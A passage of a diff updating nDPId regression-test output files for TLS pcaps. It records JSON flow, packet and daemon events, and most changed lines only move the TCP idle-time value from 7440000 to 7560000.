-00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168079905,"flow_last_seen":1626168080098,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168079937,"flow_last_seen":1626168080098,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168080539,"flow_last_seen":1626168080694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168080569,"flow_last_seen":1626168080730,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168077469,"flow_last_seen":1626168077750,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53910,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168077506,"flow_last_seen":1626168077753,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53911,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168079158,"flow_last_seen":1626168079311,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168079191,"flow_last_seen":1626168079355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53915,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1626168079905,"flow_last_seen":1626168080098,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":364,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53916,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168079937,"flow_last_seen":1626168080098,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53917,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168080539,"flow_last_seen":1626168080694,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53918,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00702{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1626168080569,"flow_last_seen":1626168080730,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4378,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"40.113.10.47","src_port":53919,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077750,"flow_last_seen":1626168077780,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"17.253.54.251","src_port":49216,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} -00675{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168081935,"flow_last_seen":1626168081946,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":16,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"130.211.33.145","dst_ip":"192.168.1.121","src_port":443,"dst_port":53432,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} -00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168081935,"flow_last_seen":1626168081946,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":16,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"130.211.33.145","dst_ip":"192.168.1.121","src_port":443,"dst_port":53432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168081935,"flow_last_seen":1626168081946,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":16,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"130.211.33.145","dst_ip":"192.168.1.121","src_port":443,"dst_port":53432,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} +00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168081935,"flow_last_seen":1626168081946,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":16,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"130.211.33.145","dst_ip":"192.168.1.121","src_port":443,"dst_port":53432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00608{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1626168075993,"flow_last_seen":1626168077017,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":108,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip6","src_ip":"fe80::1059:a858:f9e7:cf94","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077734,"flow_last_seen":1626168077848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"140.82.113.26","src_port":53905,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077734,"flow_last_seen":1626168077848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"140.82.113.26","src_port":53905,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00622{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1626168074926,"flow_last_seen":1626168076790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4712,"flow_avg_l4_payload_len":362,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":52721,"dst_port":55367,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00607{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1626168074926,"flow_last_seen":1626168076790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4712,"flow_avg_l4_payload_len":362,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":52721,"dst_port":55367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00655{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077734,"flow_last_seen":1626168077848,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"140.82.113.26","src_port":53905,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00598{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1626168077734,"flow_last_seen":1626168077848,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"140.82.113.26","src_port":53905,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00622{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1626168074926,"flow_last_seen":1626168076790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4712,"flow_avg_l4_payload_len":362,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":52721,"dst_port":55367,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00607{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1626168074926,"flow_last_seen":1626168076790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4712,"flow_avg_l4_payload_len":362,"midstream":1,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"192.168.1.139","src_port":52721,"dst_port":55367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1626168077735,"flow_last_seen":1626168077749,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":94,"midstream":0,"thread_ts_msec":1626168081946,"l3_proto":"ip4","src_ip":"192.168.1.121","dst_ip":"8.8.8.8","src_port":65213,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} 00579{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":315,"source":"tls_certificate_too_long.pcap","alias":"nDPId-test","packets-captured":315,"packets-processed":315,"total-skipped-flows":0,"total-l4-data-len":95708,"total-not-detected-flows":1,"total-guessed-flows":5,"total-detected-flows":31,"total-detection-updates":24,"total-updates":0,"current-active-flows":0,"total-active-flows":35,"total-idle-flows":35,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":218,"global_ts_msec":1626168081946} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ diff --git a/test/results/tls_cipher_lens.pcap.out b/test/results/tls_cipher_lens.pcap.out index 01dc34f16..e28520b74 100644 --- a/test/results/tls_cipher_lens.pcap.out +++ b/test/results/tls_cipher_lens.pcap.out @@ -1,25 +1,25 @@ 00466{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1391444859282} -00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mDAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAASAD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} -00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51587,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.google.it","ja3":"755cdaa3496eb8728247a639dee17aad","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mGAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAhgD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} -00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51590,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51589,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1391444859282,"pkt":"AAxBruSU1L7ZA8KHCABFAADbL\/VAAIAGLPPAqAsLrcIjv8mFAbt4uQ2cyozKYVAYQTfWXgAAFgMBAK4BAACqAwFS78N7ztpSIkL8KKK08T09+y4UedH3BkkDySiPn3PRIwAAhQD\/wArAFACIAIcAOQA4wA\/ABQCEADXACcAHwBPAEQBFAEQAMwAywA7ADMAEwAIAlgBBAC8ABQAEwAjAEgAWABPADcAD\/v8ACgEAADkAAAASABAAAA13d3cuZ29vZ2xlLml0AAoACAAGABcAGAAZAAsAAgEAACMAADN0AAAABQAFAQAAAAA="} -00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51589,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"tls_cipher_lens.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1391444859282,"flow_last_seen":1391444859282,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1391444859282,"l3_proto":"ip4","src_ip":"192.168.11.11","dst_ip":"173.194.35.191","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 